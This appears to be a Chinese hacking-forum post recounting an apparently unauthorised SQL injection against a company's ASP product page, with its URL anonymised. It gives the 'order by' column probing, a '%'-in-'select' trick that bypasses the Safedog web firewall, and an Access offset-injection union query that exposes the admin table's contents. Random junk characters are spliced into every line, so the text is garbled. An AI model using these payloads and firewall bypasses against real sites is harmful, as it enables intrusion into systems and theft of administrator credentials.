打开网站,一个企业站。 t+ i3 I, ]. J _2 U& |& B
0 r- k' P# T9 W2 o+ Q# d- y6 F
! P% M, p" e# [6 _6 c顺手加个admin0 j$ O d$ i& u; X0 w
% H* u+ w" \ W% T6 U
8 c* m' o9 w: `3 x3 c0 e" ]
默认后台。6 M% x' ^; l. M" ~1 M9 i1 A
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
4 v4 }! k0 y4 s+ H+ y# i8 W4 E( |" N" u- G3 X) r! `9 O6 X
' V6 ]" G( H. J9 T p5 a' ^9 \) t7 w% \1 f5 Y; u* o
所以就不用御剑扫了,待会直接封IP。
" E5 d/ C+ P* H( |7 } ; C$ q, l1 t( ? E1 j
用order by语句判断是否存在注入。: C. D" l' g. ]7 v+ m
http://www.xxx.com /product_show.asp?id=997 order by 1
. D x1 \% ]: j3 g: b; d6 ohttp://www.xxx.com /product_show.asp?id=997 order by 100
" |$ Q* Z" u/ V5 V+ O2 w现在存在注入,经测试后发现是9个字段。, E0 v X, ?% V' y6 e# K
$ x- f: B; D4 F+ U/ i
接下来进行联合查询,猜是否存在admin表。
7 b# @; P G- ~8 d" Zhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
) V7 D) g; }+ | J) a k3 s0 C% P4 `6 E
9 { D* s! F/ _: a8 ]# B
2 D, Z5 O! ]- D- w
在select中间加个%,se%lect绕过安全狗。
8 J3 t& t) J. s4 M/ e+ z6 v* M' w7 e) k- z5 W. B. ]
% f' N9 k% v0 W% o2 G" W1 |发现存在admin表,然后开始手工猜常用的字段。1 O9 ]0 p' R7 \5 `
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
0 L6 O* r0 o# R& A$ m 4 f. N; J; U$ ]' `
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。3 f9 I/ v6 x* S
# Z/ Q- Y5 z [科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。( L8 \; G/ e8 T
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin1 K9 {. Q" d2 M% S; O' }# y
好了,敏感内容出显了。
( B$ s9 K1 p5 b
1 ]1 ~! c, w0 Q! r) V) Z/ }
% \) |4 R7 k# O* Q; o
$ I: U+ \/ N* z+ H! ] |